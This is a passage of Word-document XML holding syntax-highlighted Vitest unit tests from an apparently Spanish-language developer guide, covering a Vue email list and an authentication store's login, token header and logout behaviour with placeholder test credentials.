        <w:t xml:space="preserve">// El segundo email (index 1) es isRead=false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(items[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">classes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'font-semibold'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Ejemplo de test para composable de autenticación:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/src/composables/__tests__/useAuth.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> beforeEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> afterEach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 ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nextTick } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'vue'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { withSetup } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../../test/utils'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { useAuthStore } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../stores/auth'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { api } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../lib/api'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Mock del módulo API</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../lib/api'</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api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    post</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defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {} }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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'useAuthStore'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beforeEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useFakeTimers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">clearAllMocks</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afterEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useRealTimers</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'inicia con estado no autenticado'</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[store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> app] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">withSetup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useAuthStore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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isAuthenticated</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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeNull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">unmount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'login almacena accessToken y configura header'</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mockResponse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'test-token-123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { id</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username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'testuser'</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vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mockResolvedValueOnce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(mockResponse)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> app] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">withSetup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useAuthStore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store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'testuser'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'password123'</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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</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'test-token-123'</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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isAuthenticated</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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</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'testuser'</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(api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Authorization'</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'Bearer test-token-123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">unmount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'logout limpia estado y headers'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vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mockResolvedValueOnce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[store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> app] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">withSetup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useAuthStore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken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'existing-token'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
